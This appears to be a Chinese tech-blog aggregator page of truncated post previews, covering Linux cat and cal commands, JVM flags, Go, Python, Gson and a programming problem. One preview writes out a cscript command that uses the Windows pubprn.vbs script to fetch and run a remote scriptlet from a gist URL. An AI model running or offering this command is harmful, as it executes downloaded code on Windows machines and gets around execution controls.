题目描述 It is a well-known fact that behind every good comet is a UFO. These UFOs often come to collect loyal supporters from here on Earth. Unfortunatel ...
分类:
其他好文 时间:
2018-07-18 01:16:09
阅读次数:
344
cat命令是linux下的一个文本输出命令,通常是用于观看某个文件的内容的;cat主要有三大功能:1.一次显示整个文件。$ cat filename2.从键盘创建一个文件。$ cat > filename只能创建新文件,不能编辑已有文件.3.将几个文件合并为一个文件。$cat file1 file2 ...
分类:
系统相关 时间:
2018-04-30 13:32:58
阅读次数:
201
远程执行sct的另一种姿势 cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64a ...
分类:
其他好文 时间:
2018-04-30 13:23:11
阅读次数:
193
using System.Drawing;using System.Drawing.Drawing2D;using System.Drawing.Printing; ...
JVM实用参数(三)打印所有XX参数及值 原文地址:https://blog.codecentric.de/en/2012/07/useful-jvm-flags-part-3-printing-all-xx-flags-and-their-values/ 译者:李洪柱 校对:方腾飞 本篇文章基于J ...
分类:
其他好文 时间:
2018-04-13 11:08:19
阅读次数:
187
1、输入输出 2、Getting started with python 3、Advaned data types 4、Advaned printing ...
分类:
其他好文 时间:
2018-02-15 16:54:52
阅读次数:
120
https://www.jianshu.com/p/674dc7d7b4b0 函数进阶教程 - 分支、循环、子程序 按照面向过程程序设计的标准流程,我们讲完了顺序结构,就要讲分支、循环和子程序。下面我们就开始讲用于分支、循环和子程序调用功能的函数。 分支函数 要走分支,一定是要有条件要判断。 在Ma ...
分类:
移动开发 时间:
2018-02-10 13:06:15
阅读次数:
242
(1)int转string ? 1 2 s := strconv.Itoa(i) 等价于s := strconv.FormatInt(int64(i), 10) ? 1 2 s := strconv.Itoa(i) 等价于s := strconv.FormatInt(int64(i), 10) ? ...
分类:
编程语言 时间:
2018-01-25 23:07:02
阅读次数:
294
https://www.jianshu.com/p/fc5c9cdf3aab 前言 最近在研究Retrofit中使用的Gson的时候,发现对Gson的一些深层次的概念和使用比较模糊,所以这里做一个知识点的归纳整理。 Gson(又称Google Gson)是Google公司发布的一个开放源代码的Jav ...
分类:
其他好文 时间:
2018-01-09 21:20:50
阅读次数:
190
cal:calender,显示月历 -j:用凯撒历(dates of julius caesar)的形式来显示月历,不分月份。1-365/366 -m:显示月历时,把星期一定为一周的开始。默认星期日为一周的开始 -y:显示今年所有月份的月历 cat:concatenate 连接多个文件,并将他们呢的 ...
分类:
系统相关 时间:
2017-11-14 22:20:48
阅读次数:
177